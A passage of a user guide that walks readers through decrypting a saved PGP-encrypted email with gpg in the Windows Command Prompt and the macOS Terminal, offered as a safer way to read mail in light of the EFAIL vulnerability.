1. Open the start menu by clicking the “Windows” icon in the bottom-left corner of the screen or pressing the “Windows” key on your keyboard.

2. Next, type “cmd” in the start menu that appears, and then the “enter” key.

3. You will now see a “Command Prompt” window appear.

4. Type exactly “cd Desktop”, then hit the “Enter” key.

5. Type the following text exactly: “gpg -d encrypted.eml”, then hit the “Enter” key. Outlook users should type exactly “gpg -d encrypted.asc” instead.

6. You will now be prompted to enter your GPG passphrase. Type it into the dialog, which may look different for Enigmail users, then hit the “Enter” key.

7. You should now see the contents of the message in the Command Prompt window.

These notes are based on Windows 10 with Gpg4win.

Using the Command Line to Decrypt a Message on macOS

If you have disabled the PGP plugin from your mail client and saved a copy of an encrypted email to your desktop, this guide will help you read that message in as safe a way as possible given what we know about the vulnerability described by EFAIL.

1. Open Finder (the blue smiley face icon) from the dock.


2. Click Applications on the left side of the window.

3. Scroll down and double-click the Utilities folder.


4. Double-click Terminal to open the command line.


5. Type “cd Desktop” and hit enter to go to your desktop. Mind the capital ‘D’!


6.Type “gpg --d encrypted.eml”. (Note, if you named your file something else, you can swap it with the “encrypted.eml” text. Be mindful of capitalization and spelling!)

7. This will prompt you for your PGP passphrase and output the full email in the terminal window. Note that attachments and emoji will not render using this method, and it will be in plaintext. Email headers will be visible, as well as the PGP signature.



JavaScript license information